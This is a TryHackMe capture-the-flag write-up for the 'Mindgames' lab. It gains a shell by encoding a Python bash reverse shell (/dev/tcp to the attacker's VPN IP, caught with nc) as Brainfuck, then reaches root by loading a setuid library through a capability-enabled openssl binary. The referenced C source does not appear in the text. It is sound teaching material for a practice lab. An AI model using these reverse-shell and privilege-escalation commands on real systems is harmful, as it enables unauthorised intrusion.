Hello. I’m Rahmos. Here is my Mindgames — TryHackMe — Writeup. Check it out!
First, deploy the machine and nmap for opend ports:
nmap -A -T4 -p- -v <ip>
There are 2 ports opened: 22 (SSH) and 80 (HTTP).
First, let’s access the website.
Okay so it’s many lines of Brainfuck program language. And also a box for us to run code. I try to paste the “Hello,World” Brainfuck line and it works!
That means you need to convert your Python code to Brainfuck language, and it can be executed here. So if I convert my python reverse shell code to Brainfuck and run, maybe I’ll get the shell also! Note that it can only run by Python, not other language.
I will use this link to decode or encode my Python code to Brainfuck. So here’s my Python code:
os.system(‘bash -c “bash -i >& /dev/tcp/<my-VPN-ip>/4444 0>&1”’)
Put these lines to the link above and click encrypt, you will get the Brainfuck code back.
Start a listener on your machine:
nc -lvnp 4444
Then paste the Brainfuck code to the website and run, you will have the shell!
Now I’m in! Move around and get the 1st flag:
Now I’ll find a way to own root and get the final flag. Spawn a tty shell for stability using Python:
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
First, let’s try sudo -l to see if mindgames can run sudo:
Uh oh! I haven’t known mindgames’s password yet, so I cannot run sudo now. Let’s try another way. This time, use Capabilities:
getcap -r / 2>/dev/null
The “openssl” has the setuid cap. Which means, I can use openssl to setuid to 0 (root’s uid) and become root. Look at openssl | GTFOBins:
OpenSSL can execute code via a library. So, I can code a simple C program to setuid(0), compile it to a library and use Openssl to exec it. I’ll use this link for reference.
My program will look like this:
Now, compile this .c file and make it a library, then transfer to the target machine.
gcc -fPIC -o shellroot.o -c shellroot.c
gcc -shared -o shellroot.so -lcrypto shellroot.o
These 2 commands will compile the C program to a library called “shellroot.so”:
now start a http server from your machine:
python3 -m http.server 9000
python2 SimpleHTTPServer 9000
then from the target machine, cd /tmp and:
The library has been transferred successfully! Now use OpenSSL to exec this lib:
openssl req -engine /tmp/shellroot.so
Now I’m root! Get the final flag: